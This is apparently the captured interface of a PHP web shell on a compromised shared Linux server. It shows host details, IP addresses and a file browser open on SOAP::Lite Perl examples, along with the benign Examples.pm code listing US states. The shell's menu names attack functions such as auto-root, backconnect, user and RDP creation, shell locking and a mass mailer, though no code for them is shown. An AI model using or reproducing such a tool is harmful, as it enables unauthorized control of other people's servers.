Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libsoap-lite-perl /
examples /
My /
[ HOME SHELL ]
Name
Size
Permission
Action
Chat.pm
1009
B
-rw-r--r--
Examples.pm
1.04
KB
-rw-r--r--
Parameters.pm
1.58
KB
-rw-r--r--
PersistentIterator.pm
221
B
-rw-r--r--
PingPong.pm
232
B
-rw-r--r--
SessionIterator.pm
187
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Examples.pm
package My::Examples; my @states = (undef, # we want to start from one :) qw/Alabama Alaska Arizona Arkansas California Colorado Connecticut Delaware Florida Georgia Hawaii Idaho Illinois Indiana Iowa Kansas Kentucky Louisiana Maine Maryland Massachusetts Michigan Minnesota Mississippi Missouri Montana Nebraska Nevada/, 'New Hampshire', 'New Jersey', 'New Mexico', 'New York', 'North Carolina', 'North Dakota', qw/Ohio Oklahoma Oregon Pennsylvania/, 'Rhode Island', 'South Carolina', 'South Dakota', qw/Tennessee Texas Utah Vermont Virginia Washington/, 'West Virginia', 'Wisconsin', 'Wyoming' ); sub getStateName { my $self = shift; $states[shift]; } sub getStateNames { my $self = shift; join "\n", map {$states[$_]} @_; } sub getStateList { my $self = shift; [map {$states[$_]} @{shift()}]; } sub getStateStruct { my $self = shift; my %states = %{shift()}; # be careful to distinguish block from hash. Just {} won't work +{map {$_ => $states[$states{$_}]} keys %states}; } 1;
Close